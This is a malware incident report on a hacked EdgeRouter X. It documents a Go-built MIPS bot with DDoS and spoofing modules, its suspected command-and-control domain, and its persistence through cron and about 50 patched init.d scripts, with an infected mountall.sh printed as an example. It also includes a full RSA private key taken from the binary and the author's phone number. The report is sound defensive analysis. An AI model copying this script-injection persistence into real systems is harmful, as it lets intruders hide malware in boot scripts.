email: jan@panoch.net phone: +420602492361 in directory etc-profile-d is mips binary file - malware from EdgerouterX the same file is present on multiple locations in filesystem some infos: ----------------------------------------------------------------------- 1) the malware binary on filesystem - same file with multiple names ./usr/lib/libgdi.so.0.8.2 5632 KB ./usr/sbin/netstat.cfg 5632 KB ./root/mips 5632 KB ./root/mipsel 5632 KB ./etc/profile.d/bash.cfg 5632 KB ./lib/system.mark 5632 KB ./boot/system.pub 5632 KB ./root.dev/w/usr/lib/libgdi.so.0.8.2 5632 KB ./root.dev/w/usr/sbin/netstat.cfg 5632 KB ./root.dev/w/root/mips 5632 KB ./root.dev/w/root/mipsel 5632 KB ./root.dev/w/etc/profile.d/bash.cfg 5632 KB ./root.dev/w/lib/system.mark 5632 KB ./root.dev/w/boot/system.pub 5632 KB bash.cfg: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), statically linked, stripped it contains some readable strings and looks like it's programmed in GO and compiled to binary format and developed on windows platform. C:/Program Files/Go/src/path/filepath/path_unix.go C:/Program Files/Go/src/path/filepath/match.go C:/Program Files/Go/src/crypto/x509/cert_pool.go C:/Program Files/Go/src/crypto/x509/x509.go C:/Program Files/Go/src/crypto/x509/parser.go C:/Program Files/Go/src/crypto/x509/pkcs1.go C:/Program Files/Go/src/crypto/x509/root.go C:/Program Files/Go/src/crypto/x509/root_unix.go C:/Program Files/Go/src/crypto/x509/verify.go C:/Program Files/Go/src/crypto/x509/pem_decrypt.go C:/Users/Administrator/go/pkg/mod/golang.org/x/crypto@v0.12.0/curve25519/curve25519.go C:/Users/Administrator/go/pkg/mod/golang.org/x/crypto@v0.12.0/curve25519/curve25519_go120.go C:/Program Files/Go/src/vendor/golang.org/x/crypto/hkdf/hkdf.go C:/Program Files/Go/src/bufio/bufio.go C:/Program Files/Go/src/mymod/tls/brotli/bit_reader.go C:/Program Files/Go/src/mymod/tls/brotli/decode.go C:/Program Files/Go/src/mymod/tls/brotli/symbol_list.go C:/Program Files/Go/src/mymod/tls/brotli/context.go C:/Program Files/Go/src/mymod/tls/brotli/constants.go C:/Program Files/Go/src/mymod/tls/brotli/state.go C:/Program Files/Go/src/mymod/tls/brotli/huffman.go C:/Program Files/Go/src/mymod/tls/brotli/util.go C:/Program Files/Go/src/mymod/tls/brotli/reader.go C:/Program Files/Go/src/mymod/tls/brotli/transform.go C:/Program Files/Go/src/mymod/tls/brotli/backward_references.go C:/Users/Administrator/go/pkg/mod/golang.org/x/crypto@v0.12.0/sha3/hashes.go C:/Users/Administrator/go/pkg/mod/golang.org/x/crypto@v0.12.0/sha3/keccakf.go C:/Users/Administrator/go/pkg/mod/golang.org/x/crypto@v0.12.0/sha3/register.go C:/Users/Administrator/go/pkg/mod/golang.org/x/crypto@v0.12.0/sha3/sha3.go C:/Users/Administrator/go/pkg/mod/golang.org/x/crypto@v0.12.0/sha3/xor_generic.go C:/Program Files/Go/src/mymod/tls/alert.go C:/Program Files/Go/src/mymod/tls/auth.go C:/Program Files/Go/src/mymod/tls/common.go C:/Program Files/Go/src/mymod/tls/cipher_suites.go C:/Program Files/Go/src/mymod/tls/notboring.go C:/Program Files/Go/src/mymod/tls/common_string.go C:/Program Files/Go/src/mymod/tls/conn.go C:/Program Files/Go/src/mymod/tls/handshake_client.go C:/Program Files/Go/src/mymod/tls/prf.go C:/Program Files/Go/src/mymod/tls/handshake_messages.go C:/Program Files/Go/src/mymod/tls/handshake_client_tls13.go C:/Program Files/Go/src/mymod/tls/u_handshake_client.go C:/Program Files/Go/src/mymod/tls/u_public.go C:/Program Files/Go/src/mymod/tls/u_prng.go C:/Program Files/Go/src/mymod/tls/u_handshake_messages.go C:/Program Files/Go/src/mymod/tls/key_agreement.go C:/Program Files/Go/src/mymod/tls/key_schedule.go C:/Program Files/Go/src/mymod/tls/tls.go C:/Program Files/Go/src/mymod/tls/u_common.go C:/Program Files/Go/src/mymod/tls/u_conn.go C:/Program Files/Go/src/mymod/tls/u_tls_extensions.go C:/Program Files/Go/src/mymod/tls/u_parrots.go C:/Users/Administrator/go/pkg/mod/golang.org/x/crypto@v0.12.0/sha3/shake.go C:/Program Files/Go/src/compress/flate/deflate.go C:/Program Files/Go/src/compress/flate/token.go C:/Program Files/Go/src/compress/flate/huffman_bit_writer.go C:/Program Files/Go/src/compress/flate/huffman_code.go C:/Program Files/Go/src/compress/flate/deflatefast.go C:/Program Files/Go/src/compress/flate/dict_decoder.go C:/Program Files/Go/src/compress/flate/inflate.go C:/Program Files/Go/src/hash/crc32/crc32.go C:/Program Files/Go/src/hash/crc32/crc32_generic.go C:/Program Files/Go/src/compress/gzip/gunzip.go C:/Program Files/Go/src/mymod/textproto/header.go C:/Program Files/Go/src/mymod/textproto/reader.go C:/Program Files/Go/src/mymod/textproto/textproto.go C:/Program Files/Go/src/net/textproto/reader.go C:/Program Files/Go/src/net/textproto/textproto.go C:/Program Files/Go/src/log/log.go C:/Program Files/Go/src/vendor/golang.org/x/text/unicode/bidi/prop.go C:/Program Files/Go/src/vendor/golang.org/x/text/unicode/bidi/tables15.0.0.go C:/Program Files/Go/src/vendor/golang.org/x/text/secure/bidirule/bidirule.go C:/Program Files/Go/src/vendor/golang.org/x/text/secure/bidirule/bidirule10.0.0.go C:/Program Files/Go/src/vendor/golang.org/x/text/unicode/norm/composition.go C:/Program Files/Go/src/vendor/golang.org/x/text/unicode/norm/forminfo.go C:/Program Files/Go/src/vendor/golang.org/x/text/unicode/norm/input.go C:/Program Files/Go/src/vendor/golang.org/x/text/unicode/norm/iter.go C:/Program Files/Go/src/vendor/golang.org/x/text/unicode/norm/normalize.go C:/Program Files/Go/src/vendor/golang.org/x/text/unicode/norm/tables15.0.0.go C:/Program Files/Go/src/vendor/golang.org/x/text/unicode/norm/trie.go C:/Program Files/Go/src/vendor/golang.org/x/text/unicode/norm/transform.go C:/Program Files/Go/src/vendor/golang.org/x/net/idna/idna10.0.0.go C:/Program Files/Go/src/vendor/golang.org/x/net/idna/trieval.go C:/Program Files/Go/src/vendor/golang.org/x/net/idna/punycode.go C:/Program Files/Go/src/vendor/golang.org/x/net/idna/tables15.0.0.go C:/Program Files/Go/src/vendor/golang.org/x/net/idna/trie.go C:/Program Files/Go/src/vendor/golang.org/x/net/idna/trie13.0.0.go C:/Program Files/Go/src/vendor/golang.org/x/net/http/httpguts/httplex.go C:/Program Files/Go/src/vendor/golang.org/x/net/http/httpguts/guts.go C:/Program Files/Go/src/vendor/golang.org/x/net/http2/hpack/encode.go C:/Program Files/Go/src/vendor/golang.org/x/net/http2/hpack/hpack.go C:/Program Files/Go/src/vendor/golang.org/x/net/http2/hpack/tables.go C:/Program Files/Go/src/vendor/golang.org/x/net/http2/hpack/huffman.go C:/Program Files/Go/src/vendor/golang.org/x/net/http2/hpack/static_table.go C:/Program Files/Go/src/mymod/internal/chunked.go C:/Program Files/Go/src/mymod/http/client.go C:/Program Files/Go/src/mymod/http/request.go C:/Program Files/Go/src/mymod/http/header.go C:/Program Files/Go/src/mymod/http/response.go C:/Program Files/Go/src/mymod/http/h2_bundle.go C:/Program Files/Go/src/mymod/httptrace/trace.go C:/Program Files/Go/src/mymod/http/http.go C:/Program Files/Go/src/mymod/http/roundtrip.go C:/Program Files/Go/src/mymod/http/status.go C:/Program Files/Go/src/mymod/http/transfer.go C:/Program Files/Go/src/mymod/http/transport.go C:/Program Files/Go/src/mymod/http/transport_default_other.go C:/Program Files/Go/src/os/exec/exec.go C:/Program Files/Go/src/os/exec/exec_unix.go C:/Program Files/Go/src/os/exec/lp_unix.go C:/Program Files/Go/src/internal/syscall/unix/eaccess_linux.go C:/Program Files/Go/src/os/signal/signal.go C:/Program Files/Go/src/os/signal/signal_unix.go C:/Program Files/Go/src/io/ioutil/ioutil.go C:/Program Files/Go/src/mymod/websocket/client.go C:/Program Files/Go/src/mymod/websocket/tls_handshake.go C:/Program Files/Go/src/mymod/websocket/compression.go C:/Program Files/Go/src/mymod/websocket/conn.go C:/Program Files/Go/src/mymod/websocket/mask.go C:/Program Files/Go/src/mymod/websocket/util.go C:/Users/Administrator/Desktop/GGGG-55555/Client/attack.go C:/Users/Administrator/Desktop/GGGG-55555/Client/client.go C:/Users/Administrator/Desktop/GGGG-55555/Client/util.go C:/Users/Administrator/Desktop/GGGG-55555/Client/clients.go C:/Users/Administrator/Desktop/GGGG-55555/Client/getrand.go C:/Users/Administrator/Desktop/GGGG-55555/Client/http.go C:/Users/Administrator/Desktop/GGGG-55555/Client/ini.go C:/Users/Administrator/Desktop/GGGG-55555/Client/init.go C:/Users/Administrator/Desktop/GGGG-55555/Client/main.go C:/Program Files/Go/src/os/exec/lp_unix.go C:/Program Files/Go/src/internal/syscall/unix/eaccess_linux.go C:/Program Files/Go/src/os/signal/signal.go C:/Program Files/Go/src/os/signal/signal_unix.go C:/Program Files/Go/src/io/ioutil/ioutil.go C:/Program Files/Go/src/mymod/websocket/client.go C:/Program Files/Go/src/mymod/websocket/tls_handshake.go C:/Program Files/Go/src/mymod/websocket/compression.go C:/Program Files/Go/src/mymod/websocket/conn.go C:/Program Files/Go/src/mymod/websocket/mask.go C:/Program Files/Go/src/mymod/websocket/util.go C:/Users/Administrator/Desktop/GGGG-55555/Client/attack.go C:/Users/Administrator/Desktop/GGGG-55555/Client/client.go C:/Users/Administrator/Desktop/GGGG-55555/Client/util.go C:/Users/Administrator/Desktop/GGGG-55555/Client/clients.go C:/Users/Administrator/Desktop/GGGG-55555/Client/getrand.go C:/Users/Administrator/Desktop/GGGG-55555/Client/http.go C:/Users/Administrator/Desktop/GGGG-55555/Client/ini.go C:/Users/Administrator/Desktop/GGGG-55555/Client/init.go C:/Users/Administrator/Desktop/GGGG-55555/Client/main.go C:/Users/Administrator/Desktop/GGGG-55555/Client/raw.go C:/Users/Administrator/Desktop/GGGG-55555/Client/socks5.go C:/Users/Administrator/Desktop/GGGG-55555/Client/spoof.go C:/Users/Administrator/Desktop/GGGG-55555/Client/tcp.go C:/Users/Administrator/Desktop/GGGG-55555/Client/tls.go C:/Users/Administrator/Desktop/GGGG-55555/Client/type.go C:/Users/Administrator/Desktop/GGGG-55555/Client/watchdog.go C:/Users/Administrator/Desktop/GGGG-55555/Client/ws.go some RSA keys present in this binary file: -----BEGIN RSA PUBLIC KEY----- MIIBCgKCAQEA3VFdXkoaxhcG3LWYkkiL69RtujQS8rno9CwKz1OjBy4p4zekQRjF XkvYhqxwzxwPpdHnzUMj+IyHKq/e4LCRBSKz9p60N5ohXDRXvI9UomQLNM/PEZiI oBeiYQAGgCvWtvwPbW1QGk0GAl66WRpsusuHIbJe839qbfAr/T5XdgnEKN8x0BND e+CBdhU9G95gPUdLL7uooSFykMrE8LPAyX4RlGmnVRCcKd1ZWKLYhufh+VqtJ/Lr i08+Py9RUx/tfa8lLp6lcazn4JOisAUNyfqhUhube5/yPycFj2EYUVXVqXoJ640u 5tzjP/vbg2IYVQqMllFX1PY40Z91j2HQyQIDAQAB -----END RSA PUBLIC KEY----- -----BEGIN RSA PRIVATE KEY----- MIIEpgIBAAKCAQEA86KfJdKRtFubDeB6WIHb3iCWKl7m6cq0AahplJzHnknhArLb cAVTDY/vTYVPFng/V4vozGL6prtjDznJnjdCt9ZyvjJmQt7Tt8cAAoIuQIaM6SHw ajtFvntq6BOusW/LGSHjrbq1mQV4orBbRxQnurfG0fWUy7NYZ4MJzEvGiL5MPNnW iVXYgrsE6pdcjMfZ63sy5uI6HZ4CVT21MkmkJfHGjjyrZf6QeTuEEQC+EP2pPRex TZkw0D3BvYFI8HlYq5MozJrePkLT6GAHYYV8js/1sFTq2MKCy40lrPsW1gj4xBnS hKD5K7capEc1LhAtERK/pqWx4p32mVHSbWnSKQIDAQABAoIBAQDhSwE2HYkFKiyw 4WLhk3v45VNXbRjFGt/oJI81kOD628CKGVDYPuQ1R2N34Q1obtvMHiGxVtoH8oJA 4yQw/VLh4xmKDdsIfTt01z2IFE+m9YU6VFsYMSVmZoROhVzm0cUSwYbj8SLalPeg IcrWaKnwfN8K6rikwXy/g6o809mMOfcST7NQ0cCt0VCsdy4S4mzg6u7h7f99rC6U No3S/tSBVKnedh4+rVrrjrs43WrMvQ+SUzOqX6soeZab4vzVWKSCsRNuv8HMp403 QDGpQi04/2PsS+Y2ffo6LvP7kZ8omQGCdm6H1Qjvr5ldnOCr0gladF9XWdI7uMKA JURaNhEtAoGBAP8ezJvdfpe1iLfE8bYb3jbwO2KoWPfRrEZ3YYJk1R2PEZS4bSPh MpR6dio0iFXtPd0HTR//3ijg7P0RGJtf6n1ugQ7RjdeYh2OXkWOyqrH97xV3jLYz +2hWD0j/JRBtcNQeCkjVN7U8nmgE53/JkJDsJOm6ydCJVQTEQ7Y8KEpjAoGBAPR5 ryynMrjeQP7NLyigd3uFiK6WGbMvmNJREQn6OY/i3DXcP5hCmdG9oo+zVQ5G/PnF VuZ1Bdbt2uDpC4KKJvD81KN/Fy28jMY+1NhaUxlcBKwUVhcw1+mlwbo/33v0b6qS NzDIArgm1kE/fMdFTcwamQf70CWsUgExH3G2vDEDAoGBAPYD309WsmLdne+IrYXt LcZQtxOWP+UKflSdfpxdW93bPxrpFeYJndrslNJyQh6KXqOsDMWU2ckVzbLkL5R1 VAyM6Us+7MdAwR5a5Mr9Wfm2ZD2RQVHaos+kXa0IzdcfkjQam9RMOCI/SIoKYKsr 1orKDXaOt1qvdBraoGk1baz9AoGBAKkAyclLmDPWaQX74ALs00xPpopSd1e4qqOR qP7FvS8ru+F77Xaba+xjdNJ0PXNOPamI8ycDdNL8wNfEItHOIVds4K5ZuDNE6ehO HSOnZVTdmNlAgbcsa8Y4cTEI4Ly24M8AnyiYy9B0AJ9AfUjgLwTOykWLnXu9oT7z r3ITygrzAoGBAII4lHMbAnsoRVRZwJBeT53xRlTSx9CQDY5Nu2HhZ+IhmKxbBmoV Ue5FEGsCrlFwhtJ+5ay4Ifez21DveSRAlcvQqlEmy89/OAILRO54o6KrLzLNh40q EpGAsbLCb8wMc7BgAQ7F3fUUf6c7z6+VhJ1DTl/AViCfNjXq91SwrtLZ -----END RSA PRIVATE KEY----- ----------------------------------------------------------------------- 2) malware binary running after reboot systemd(1)-+-agetty(4173) |-atd(174) |-bash.cfg(4813)-+-{bash.cfg}(4814) | |-{bash.cfg}(4815) | |-{bash.cfg}(4816) | |-{bash.cfg}(4817) | `-{bash.cfg}(4818) ----------------------------------------------------------------------- 3) it's started from a lot of points - for example /etc/profile.d/bash.cfg.sh (*.sh scripts in /etc/profile.d/ are started during boot process), about 50 files patched in /etc/init.d/ and calling /lib/system.mark (malware binary) ----------------------------------------------------------------------- 4) after boot it's looking for some china domain cn.mzcn.eu.: tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 06:37:05.439599 IP 192.168.24.221.46002 > 192.168.99.9.53: 13248+ A? unms.aaadmin.cz. (33) 06:37:05.439744 IP 192.168.24.221.46002 > 192.168.99.9.53: 16905+ AAAA? unms.aaadmin.cz. (33) 06:37:05.600654 IP 192.168.24.221.40029 > 8.8.8.8.53: 27813+ [1au] AAAA? cn.mzcn.eu. (39) 06:37:05.601424 IP 192.168.24.221.40837 > 8.8.8.8.53: 30458+ [1au] A? cn.mzcn.eu. (39) 06:37:06.363607 IP 192.168.24.221.56773 > 192.168.99.9.53: 59788+ A? 0.ubnt.pool.ntp.org. (37) 06:37:06.363743 IP 192.168.24.221.56773 > 192.168.99.9.53: 12831+ AAAA? 0.ubnt.pool.ntp.org. (37) 06:37:06.497353 IP 192.168.24.221.53046 > 8.8.8.8.53: 13425+ [1au] AAAA? cn.mzcn.eu. (39) 06:37:06.497353 IP 192.168.24.221.38199 > 8.8.8.8.53: 62797+ [1au] A? cn.mzcn.eu. (39) ----------------------------------------------------------------------- 5) don't know why, but it's able to generate dos attack even if the running malware binary was killed. i saw some raw sockets opened (command ss -w), but i can't find process linked to those sockets. ----------------------------------------------------------------------- 6) from our logs i saw some establisched connections from hacked router to internet - maybe to malware's CC ipv4 2 tcp 6 431978 ESTABLISHED src=144.48.223.58 dst=89.22.80.121 sport=61912 dport=22 src=192.168.24.226 dst=144.48.223.58 sport=22 dport=61912 [ASSURED] mark=0 use=1 ipv4 2 tcp 6 299 ESTABLISHED src=80.94.95.128 dst=89.22.80.121 sport=46686 dport=22 src=192.168.24.226 dst=80.94.95.128 sport=22 dport=46686 [ASSURED] mark=0 use=1 ----------------------------------------------------------------------- 7) modified files on filesystem at the time of intrusion find . -type f -newermt 2024-09-02 ! -newermt 2024-09-03 ./root/mips ./.mod ./var/mail/root ./etc/init.d/.depend.start ./etc/init.d/.depend.boot ./etc/init.d/dns-udp4 ./etc/init.d/.depend.stop ./etc/crontab ./root.dev/w/root/mips ./root.dev/w/.mod ./root.dev/w/var/mail/root ./root.dev/w/etc/init.d/.depend.start ./root.dev/w/etc/init.d/.depend.boot ./root.dev/w/etc/init.d/dns-udp4 ./root.dev/w/etc/init.d/.depend.stop ./root.dev/w/etc/crontab - /.mod is called by cron every minute - /etc/init.d/.depend.start run /etc/init.d/dns-udp4 and then /boot/system.pub - everything above the same malware binary just in different files -------------------------------------------------------------------------- 9) about 50 files modified in directory /etc/init.d/ grep -rl "/lib/system.mark" etc/* etc/init.d/killprocs etc/init.d/snmpd etc/init.d/pmacct etc/init.d/procps etc/init.d/sudo etc/init.d/miniupnpd etc/init.d/rmnologin etc/init.d/umountfs etc/init.d/ntp etc/init.d/umountnfs.sh etc/init.d/vyatta-ppp etc/init.d/checkfs.sh etc/init.d/hwclock.sh etc/init.d/rsyslog etc/init.d/checkroot.sh etc/init.d/halt etc/init.d/xl2tpd etc/init.d/pppoe-server etc/init.d/dbus etc/init.d/urandom etc/init.d/ssh etc/init.d/rc etc/init.d/bootmisc.sh etc/init.d/mountdevsubfs.sh etc/init.d/vyatta-keepalived etc/init.d/openvpn etc/init.d/ipsec etc/init.d/skeleton etc/init.d/cron etc/init.d/networking etc/init.d/vyatta-quagga etc/init.d/mountnfs.sh etc/init.d/motd etc/init.d/mountall.sh etc/init.d/uuidd etc/init.d/umountroot etc/init.d/radvd etc/init.d/udev etc/init.d/ddclient etc/init.d/hostname.sh etc/init.d/mountkernfs.sh etc/init.d/sendsigs etc/init.d/vyatta-dhcp3-server etc/init.d/linux-igd etc/init.d/wide-dhcpv6-client etc/init.d/rc.local etc/init.d/avahi-daemon etc/init.d/ebtables etc/init.d/kmod etc/init.d/bootlogs etc/init.d/vyatta-dhcp3-relay it looks for if/then statement and add call to /lib/system.mark after then statement example /ertc/init.d/mountall.sh #! /bin/sh ### BEGIN INIT INFO # Provides: mountall # Required-Start: checkfs checkroot-bootclean # Required-Stop: # Default-Start: S # Default-Stop: # Short-Description: Mount all filesystems. # Description: ### END INIT INFO PATH=/sbin:/bin . /lib/init/vars.sh . /lib/init/tmpfs.sh . /lib/lsb/init-functions . /lib/init/mount-functions.sh . /lib/init/swap-functions.sh # for ntfs-3g to get correct file name encoding if [ -r /etc/default/locale ]; then /lib/system.mark . /etc/default/locale export LANG fi do_start() { # # Mount local file systems in /etc/fstab. # mount_all_local() { if mountpoint -q /usr; then /lib/system.mark # May have been mounted read-only by initramfs. # Remount with unmodified options from /etc/fstab. mount -o remount /usr fi mount -a -t nonfs,nfs4,smbfs,cifs,ncp,ncpfs,coda,ocfs2,gfs,gfs2,ceph \ -O no_netdev } ---------------------------------------------------------------------------- 9) Another remark - there are multiple versions for different platforms: edgerouter4 - system.pub: ELF 64-bit MSB executable, MIPS, MIPS-III version 1 (SYSV), statically linked, stripped edgerouter-x - system.pub: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), statically linked, stripped ------------------------------------------------------------------------------ 10) added files in /root.dev/w/ - for example /root.dev/w/boot/system.pub are not cursed or protected by hacked kernel - it's cunningly easy they have extended attributes set - a (append only) a i (immutable) lsattr /root.dev/w.o/boot/system.pub ----ia------------- /root.dev/w.o/boot/system.pub just use chattr and remove attributes and files can be changed/deleted: chattr -a -i /root.dev/w.o/boot/system.pub lsattr /root.dev/w.o/boot/system.pub ------------------- /root.dev/w.o/boot/system.pub rm /root.dev/w.o/boot/system.pub